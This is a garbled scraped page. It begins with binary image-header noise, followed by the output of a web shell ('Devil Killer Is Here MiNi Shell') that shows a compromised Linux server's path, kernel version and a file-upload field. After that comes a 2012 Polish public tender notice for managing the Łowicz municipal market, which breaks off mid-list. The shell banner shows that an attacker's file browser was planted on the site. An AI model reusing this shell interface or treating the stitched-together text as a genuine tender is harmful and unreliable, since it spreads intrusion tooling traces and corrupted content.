JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/159056-N-2012.html

<p class="kh_header"><b>Łowicz: Prowadzenie Targowiska Miejskiego w Łowiczu</b><br>
<b>Numer ogłoszenia: 159056 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Łowicza - Urząd Miejski w Łowiczu , Stary Rynek 1, 99-400 Łowicz, woj. łódzkie, tel. 46 8309151, faks 46 8309160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lowicz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie Targowiska Miejskiego w Łowiczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
1)	Przedmiotem zamówienia jest usługa określona w Wspólnym Słowniku Zamówień (CPV) kodem i nazwą SŁOWNIK GŁÓWNY: 70332100-8 Usługi zarządzania gruntami, polegająca na wykonywaniu powierzonego zadania z zakresu gospodarki komunalnej w rozumieniu art. 3 ust. 1 ustawy z dnia 20 grudnia 1996 r. o gospodarce komunalnej (Dz.U. z 2011 r. Nr 45, poz. 235), polegającego na prowadzeniu Targowiska Miejskiego w Łowiczu usytuowanego przy zbiegu ul. Gen. Wł. Sikorskiego i ul. Starzyńskiego jako urządzenia komunalnego przeznaczonego                         do bieżącego i nieprzerwanego zaspokajania zbiorowych potrzeb mieszkańców Gminy Miasta Łowicza.
2)	W celu wykonania powierzonego zadania, o którym mowa w pkt 1 Wykonawca zobowiązany jest do:    
a)	współdziałania z Inkasentem wyznaczonym przez Radę Miejską w Łowiczu                do poboru opłaty targowej,
b)	współdziałania z dzierżawcą terenu Targowiska Miejskiego w Łowiczu,  
c)	przestrzegania wymogów sanitarnych, weterynaryjnych, porządkowych                               i przeciwpożarowych wynikających ze stosownych przepisów prawa, 
d)	utrzymywania terenu Targowiska Miejskiego Łowiczu oraz jego bezpośredniego sąsiedztwa w należytym porządku i czystości zgodnie z przepisami prawa,
e)	zimowego utrzymania terenu Targowiska Miejskiego w Łowiczu w sposób zapewniający bezpieczną i sprawną organizację sprzedaży zgodnie z przepisami prawa oraz zgodnie z wymaganiami określonymi w uchwale Nr LII.328.2006 Rady Miejskiej w Łowiczu z dnia 23 lutego 2006 r. w sprawie Regulaminu utrzymania czystości i porządku na terenie miasta Łowicza oraz innymi przepisami prawa w przypadku ich ustalenia przez Radę Miejską w Łowiczu,
f)	całodobowego dozorowania terenu Targowiska Miejskiego w Łowiczu,
g)	zbierania znajdujących się na terenie Targowiska Miejskiego w Łowiczu odpadów komunalnych zgodnie z wymaganiami określonymi w uchwale Nr LII.328.2006 Rady Miejskiej w Łowiczu z dnia 23 lutego 2006 r. w sprawie Regulaminu utrzymania czystości i porządku na terenie miasta Łowicza oraz innymi przepisami prawa w przypadku ich ustalenia przez Radę Miejską w Łowiczu,
h)	zawarcia stosownej umowy z przedsiębiorcą posiadającym zezwolenie                                  na prowadzenie działalności w zakresie odbierania odpadów komunalnych oraz okazywania na żądanie Zamawiającego ww umowy i dowodów płacenia za takie usługi,.
i)	pokrywania wszelkich wydatków związanych z bieżącym i nieprzerwanym funkcjonowaniem Targowiska Miejskiego w Łowiczu, a w szczególności: opłat  za dostarczoną wodę i odprowadzone ścieki, opłat za dostarczoną energię elektryczną, opłat za odbiór odpadów komunalnych,
j)	utrzymania w należytym stanie technicznym i konserwacji urządzeń elektroenergetycznych:
-	przyłącza elektroenergetycznego kablowego wraz z zewnętrznymi liniami zasilającymi kablowymi dla zespołu 26 tymczasowych pawilonów handlowych typu Atlantis zlokalizowanych na Targowisku Miejskim                      w Łowiczu, zgodnie z branżowymi przepisami prawa,
-	wewnętrznych linii zasilających tymczasowych kiosków handlowych typu Gąbin zlokalizowanych na Targowisku Miejskim w Łowiczu, zgodnie branżowymi przepisami prawa,
-	przebudowanego i wybudowanego oświetlenia Targowiska Miejskiego                  w Łowiczu wraz z kablem oświetleniowym zgodnie branżowymi przepisami prawa,
-	złączy kablowych oraz wewnętrznych linii zasilających, zgodnie branżowymi przepisami prawa,
-	w przypadku uszkodzenia lub awarii w/w urządzeń elektroenergetycznych Wykonawca zobowiązany jest do naprawy zaistniałych uszkodzeń oraz usunięcia powstałych awarii, własnym kosztem i staraniem,
k)	prowadzenia, utrzymania w należytym stanie technicznym i konserwacji Ustępu Publicznego (Szaletu Miejskiego),
-	wszelkie dochody z tytułu funkcjonowania Ustępu Publicznego (Szaletu Miejskiego) wpływają na rzecz Wykonawcy,
-	Wykonawca ponosi jednocześnie wszelkie koszty (włącznie z opłatami                 za dostarczoną wodę i odprowadzone ścieki, za dostarczoną energię elektryczną) związane z jego funkcjonowaniem,
-	dbanie o utrzymanie Ustępu Publicznego (Szaletu Miejskiego) w należytym stanie technicznym i sanitarno-higienicznym należy do obowiązków Wykonawcy, 
-	wszelkie remonty, konserwacje i naprawy wyposażenia oraz urządzeń sanitarnych Wykonawca wykona własnym kosztem i staraniem,
-	Wykonawca zobowiązany jest do udostępnienia wydzielonych kabin ustępowych zarówno w części męskiej, jak i damskiej wszystkim właścicielom oraz ich pracownikom pawilonów i kiosków handlowych, zlokalizowanych            na Targowisku Miejskim w Łowiczu z zgodnie z zaleceniami Państwowego Powiatowego Inspektora Sanitarnego w Łowiczu,    
l)	utrzymania w należytym stanie technicznym i konserwacji urządzeń sieci wodociągowej i kanalizacji sanitarnej na Targowisku Miejskim w Łowiczu,
-	w przypadku uszkodzenia lub awarii urządzeń sieci wodociągowej                     i kanalizacji sanitarnej, Wykonawca zobowiązany jest do naprawy zaistniałych uszkodzeń oraz usunięcia powstałych awarii, własnym kosztem i staraniem,
-	w przypadku kradzieży urządzeń sieci wodociągowej i kanalizacji sanitarnej lub ich części,  Wykonawca zobowiązany jest do ich zastąpienia elementami          o takich samych lub równoważnych parametrach technicznych,
-	konserwację urządzeń sieci wodociągowej i kanalizacji sanitarnej, Wykonawca wykona własnym kosztem i staraniem,
m)	utrzymania w należytym stanie technicznym i konserwacji urządzeń sieci kanalizacji deszczowej na Targowisku Miejskim w Łowiczu,
-	w przypadku uszkodzenia lub awarii urządzeń sieci kanalizacji deszczowej, Wykonawca zobowiązany jest do naprawy zaistniałych uszkodzeń oraz usunięcia powstałych awarii, własnym kosztem i staraniem,
-	w przypadku kradzieży urządzeń sieci kanalizacji deszczowej lub ich części, Wykonawca zobowiązany jest do ich zastąpienia elementami o takich samych lub równoważnych parametrach technicznych,
-	konserwację urządzeń kanalizacji deszczowej oraz utrzymanie drożności wpustów deszczowych i przyłączy kanalizacji deszczowej od wpustów                  do kolektora, Wykonawca wykona własnym kosztem i staraniem,
n)	utrzymania w należytym stanie technicznym nawierzchni wokół urządzeń sieci wodociągowej, sieci kanalizacji sanitarnej i sieci kanalizacji deszczowej                      na Targowisku Miejskim w Łowiczu,
-	w przypadku uszkodzeń nawierzchni, takich jak: usuwiska, zapadliska                       i wypiętrzenia, Wykonawca zobowiązany jest do naprawy zaistniałych uszkodzeń, własnym kosztem i staraniem,
o)	utrzymania w należytym stanie technicznym i konserwacji ogrodzenia okalającego Targowisko Miejskie w Łowiczu,
-	w przypadku uszkodzenia elementów ogrodzenia, Wykonawca zobowiązany jest do naprawy zaistniałych uszkodzeń, własnym kosztem i staraniem,
-	w przypadku zniszczenia elementów ogrodzenia, Wykonawca zobowiązany jest do ich wymienienia (zastąpienia) elementami ogrodzenia o takich samych lub równoważnych parametrach technicznych,
-	konserwację (czyszczenie, malowanie) elementów ogrodzenia, Wykonawca wykona własnym kosztem i staraniem,      
p)	poddawania się kontroli podjętej i przeprowadzanej na podstawie upoważnienia-dyspozycji-polecenia udzielonego przez Zamawiającego                         - pracownikom Urzędu Miejskiego w Łowiczu,
q)	niezwłocznego udzielania ustnych i pisemnych informacji na temat realizacji powierzonego zadania polegającego na prowadzeniu Targowiska Miejskiego               w Łowiczu na wezwanie Zamawiającego lub pracowników Urzędu Miejskiego             w Łowiczu upoważnionych-wyznaczonych przez Zamawiającego                                 do przeprowadzenia kontroli,
r)	niezwłocznego wykonywania zaleceń lub zaleceń pokontrolnych Zamawiającego                  lub pracowników Urzędu Miejskiego w Łowiczu upoważnionych-wyznaczonych przez Zamawiającego do przeprowadzenia kontroli, w terminie nie dłuższym niż  7 dni od dnia ich przekazania,
s)	wywiązywania się z pozostałych obowiązków wynikających z umowy w sprawie zamówienia publicznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.33.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM.
1)	Wadium należy wnieść przed upływem terminu składania ofert, o którym mowa           w ust. 11 pkt 1 lit. a niniejszej Specyfikacji Istotnych Warunków Zamówienia. 
2)	Za dzień wniesienia wadium w pieniądzu uważa się datę wpływu środków finansowych (wadium) na rachunek Zamawiającego, a nie datę obciążenia rachunku Wykonawcy (wpłaty).     
3)	Wadium w wysokości: 4 000,00 zł (słownie: cztery tysiące złotych 00/100) (zgodnie           z art. 45 ust. 6 Ustawy) Wykonawca może wnieść w:  
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.),
4)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Urzędu Miejskiego w Łowiczu nr 81 1500 1689 1216 8005 0182 0000 Kredyt Bank S.A. Oddział w Skierniewicach.  
5)	Dowód wpłaty wadium należy dołączyć do złożonej oferty.
6)	Oferta nie zabezpieczona wadium (w formie zgodnej z art. 45 ust. 6 Ustawy) zostanie odrzucona.
7)	W przypadku wniesienia wadium w postaci poręczenia lub gwarancji bankowej, gwarancji  ubezpieczenio?wej lub poręczeniach udzielanych przez podmioty, o których 
	mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej 	Agencji   Rozwoju   Przedsiębiorczości,   oryginał   musi  być  złożony  wraz  z  ofertą                 
	w oddzielnej kopercie zwrotu i musi być wystawione na cały okres związania ofertą, 	natomiast potwierdzona za zgodność z oryginałem kopia winna być załączona 	(wpięta) do oferty. Do tak złożonego wadium wskazane jest dołączenie pisemnej 	informacji dotyczącej sposobu jego zwrotu. W przypadku braku powyższej informacji 	zwrot wadium w przypadkach wymienionych w Ustawie nastąpi na adres 	Wykonawcy.      

	Uwaga:  
	Niedopuszczalne jest wpłacenie wadium w kasie Urzędu Miejskiego w Łowiczu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH  WARUNKÓW 
1)	WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH  WARUNKÓW 
1)	WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a)	posiadania wiedzy i doświadczenia.
OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH  WARUNKÓW 
1)	WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a)	dysponowania odpowiednim potencjałem technicznym.
OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH  WARUNKÓW 
1)	WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a)	dysponowania osobami zdolnymi                  do wykonania zamówienia.
OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH  WARUNKÓW 
1)	WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a)	sytuacji ekonomicznej i finansowej; w tym zakresie Zamawiający wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości              nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100), przy czym ważność polisy, a w przypadku jej braku innego dokumentu ubezpieczenia, musi obejmować co najmniej dzień składania oferty; Wykonawca, który zostanie wybrany na Wykonawcę przedmiotu zamówienia publicznego zobowiązany jest do przedstawienia Zamawiającemu przed podpisaniem umowy w sprawie zamówienia publicznego opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100). Obowiązek ten nie dotyczy Wykonawcy, którego polisa lub inny dokument ubezpieczenia złożony wraz z ofertą obejmuje okres objęty realizacją przedmiotu zamówienia. W przypadku przedstawienia przez Wykonawcę Zamawiającemu przed podpisaniem  umowy w sprawie zamówienia publicznego opłaconej polisy lub innego dokumentu potwierdzającego,                          że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości                nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100)                     nie obejmującego całego okresu realizacji przedmiotu zamówienia, Wykonawca ten zobowiązany jest przedstawienia Zamawiającemu kolejnych opłaconych polis lub innych dokumentów potwierdzających, że Wykonawca jest ubezpieczony                  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej                   z przedmiotem zamówienia w wysokości nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100) w okresie realizacji przedmiotu zamówienia.   
OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

